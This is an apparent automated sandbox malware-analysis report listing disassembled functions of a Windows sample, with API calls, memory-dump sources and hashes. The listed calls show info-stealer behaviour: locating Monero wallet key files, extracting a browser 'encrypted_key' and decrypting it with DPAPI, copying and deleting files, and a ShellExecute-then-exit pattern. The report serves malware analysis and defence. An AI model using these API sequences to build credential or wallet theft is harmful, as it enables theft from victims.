                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 547e4fbe46c81b838e4184819c29e58d3e41b5bb5e31121aef6162c703d37545
                                    • Instruction ID: cc50ff314bea2a6fcedc98e33b51c9ca0b1af74312210505acee6038ffae1396
                                    • Opcode Fuzzy Hash: 547e4fbe46c81b838e4184819c29e58d3e41b5bb5e31121aef6162c703d37545
                                    • Instruction Fuzzy Hash: 570149B5A40208BFDB04DFD1DC49FAEB7BCEB88701F048155FA09E7280D6719A458F51
                                    Function 00C46630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C46663
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00C46726
                                    • ExitProcess.KERNEL32 ref: 00C46755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: 15667b520a7b59246857345257d210bd1953ee04d44ce0e79db77209ce1c0f25
                                    • Instruction ID: e696c0407e519717f425ceaa921f1f18a762fc3e7d01dffd573a767634519459
                                    • Opcode Fuzzy Hash: 15667b520a7b59246857345257d210bd1953ee04d44ce0e79db77209ce1c0f25
                                    • Instruction Fuzzy Hash: 043129B1801218AEEB14EBA0DC96BDEB778BF54300F404199F20976191DF746B89DF6A
                                    Function 00C487C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C50E28,00000000,?), ref: 00C4882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C48836
                                    • wsprintfA.USER32 ref: 00C48850
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 2523d72af5aa42835b935578563581522d0d130ce7e61e38a9ca00defc0aabf2
                                    • Instruction ID: 1af1bd7091b57e298001ce37945bf9e690a004dc15e5fa3eea4bb93ad845d9d2
                                    • Opcode Fuzzy Hash: 2523d72af5aa42835b935578563581522d0d130ce7e61e38a9ca00defc0aabf2
                                    • Instruction Fuzzy Hash: C52130B1A40204AFDB04DFD5DD49FAEBBB8FB48701F144169F609B7280C77999448BA2
                                    Function 00C48D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C4951E,00000000), ref: 00C48D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C48D62
                                    • wsprintfW.USER32 ref: 00C48D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 0369ca3acb2b4c2845fa90cff2909a0d1ca3424edbead2772259e0ebbef62215
                                    • Instruction ID: 095d7da9c801bd7be6e0732987677f78e7540a6bbb865775ddad10362dfefdbe
                                    • Opcode Fuzzy Hash: 0369ca3acb2b4c2845fa90cff2909a0d1ca3424edbead2772259e0ebbef62215
                                    • Instruction Fuzzy Hash: CDE08CB4A40208BFD704DB95DC0EE6D77BCEB84702F0800A4FD0DA7280DA719E489BA6
                                    Function 00C3A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3A2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 00C3A3FF
                                    • lstrlen.KERNEL32(00000000), ref: 00C3A6BC
                                      • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C3A743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: d6b7584c5af3f2619a6c79c59b32abe5a6e98dcf547b751af9e9b0f22b85e5ad
                                    • Instruction ID: b86c1a46df95812064394d63fd708a5952333ebb78e9584a6ebe85c475cc6ae3
                                    • Opcode Fuzzy Hash: d6b7584c5af3f2619a6c79c59b32abe5a6e98dcf547b751af9e9b0f22b85e5ad
                                    • Instruction Fuzzy Hash: 93E1EE72850108ABEB14FBA4DC96EEE7338FF54300F548169F516B2091EF306A4DEB66
                                    Function 00C3D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3D481
                                    • lstrlen.KERNEL32(00000000), ref: 00C3D698
                                    • lstrlen.KERNEL32(00000000), ref: 00C3D6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C3D72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 46a440ef283b77768bfd31f00eb3311d55b85adf028c13aa51d6d5f58d19c737
                                    • Instruction ID: a38e6b5555c82d73054e6f91391e463e3e123c6ca4d1d4f5fff4c61b2c1961ce
                                    • Opcode Fuzzy Hash: 46a440ef283b77768bfd31f00eb3311d55b85adf028c13aa51d6d5f58d19c737
                                    • Instruction Fuzzy Hash: 3A912D72850108ABEB04FBA0DC96EEE7338FF54304F544569F517B6092EF346A49EB62
                                    Function 00C3D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                      • Part of subcall function 00C48B60: GetSystemTime.KERNEL32(00C50E1A,019D9B48,00C505AE,?,?,00C313F9,?,0000001A,00C50E1A,00000000,?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C48B86
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C3D801
                                    • lstrlen.KERNEL32(00000000), ref: 00C3D99F
                                    • lstrlen.KERNEL32(00000000), ref: 00C3D9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00C3DA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: f9234e9bd46cec9cf839bdda07d9ba2ba9c14a8e33b8e241be8001822baa8316
                                    • Instruction ID: f04fc69fbe30e0bccd10caf7b993fddd4b57d1c4bc99ad49986d468c465dba4b
                                    • Opcode Fuzzy Hash: f9234e9bd46cec9cf839bdda07d9ba2ba9c14a8e33b8e241be8001822baa8316
                                    • Instruction Fuzzy Hash: 0D812E728501089BEB04FBA1DC96EEE7338FF54304F554528F407B6092EF346A49EBA2
                                    Function 00C43560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: e20abd537be7b898a20188e914ec4e32794ca842b90b9d69f4708b2f755d6673
                                    • Instruction ID: 7fb7db309a56c7f41492e2dc0d6bdcb7619b20746bd8d30f38b1b7438d82eaef
                                    • Opcode Fuzzy Hash: e20abd537be7b898a20188e914ec4e32794ca842b90b9d69f4708b2f755d6673
                                    • Instruction Fuzzy Hash: 2D415E75D10209AFDB04EFE5D845AEEB774BF84304F108128F416B6291DB34AA49DFA2
                                    Function 00C39CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C399EC
                                      • Part of subcall function 00C399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C39A11
                                      • Part of subcall function 00C399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C39A31
                                      • Part of subcall function 00C399C0: ReadFile.KERNEL32(000000FF,?,00000000,00C3148F,00000000), ref: 00C39A5A
                                      • Part of subcall function 00C399C0: LocalFree.KERNEL32(00C3148F), ref: 00C39A90
                                      • Part of subcall function 00C399C0: CloseHandle.KERNEL32(000000FF), ref: 00C39A9A
                                      • Part of subcall function 00C48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C48E52
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C39D39
                                      • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                      • Part of subcall function 00C39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                      • Part of subcall function 00C39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                      • Part of subcall function 00C39AC0: LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                      • Part of subcall function 00C39B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C39B84
                                      • Part of subcall function 00C39B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C39BA3
                                      • Part of subcall function 00C39B60: LocalFree.KERNEL32(?), ref: 00C39BD3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 099360d80dd5ee25e59c3ccceacb5b7f13e69019c754f6b7615f0424fd01c611
                                    • Instruction ID: d1c63960c9832715b499916363ad474d4ebcdbad6c7f239b415f380652e40905
                                    • Opcode Fuzzy Hash: 099360d80dd5ee25e59c3ccceacb5b7f13e69019c754f6b7615f0424fd01c611
                                    • Instruction Fuzzy Hash: B33132B6D10209ABCF14EFE4DC86AEFB7B8FF48304F144519E915A7241E7749A44CBA1
                                    Function 00C494D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00C494EB
                                      • Part of subcall function 00C48D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C4951E,00000000), ref: 00C48D5B
                                      • Part of subcall function 00C48D50: RtlAllocateHeap.NTDLL(00000000), ref: 00C48D62
                                      • Part of subcall function 00C48D50: wsprintfW.USER32 ref: 00C48D78
                                    • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00C495AB
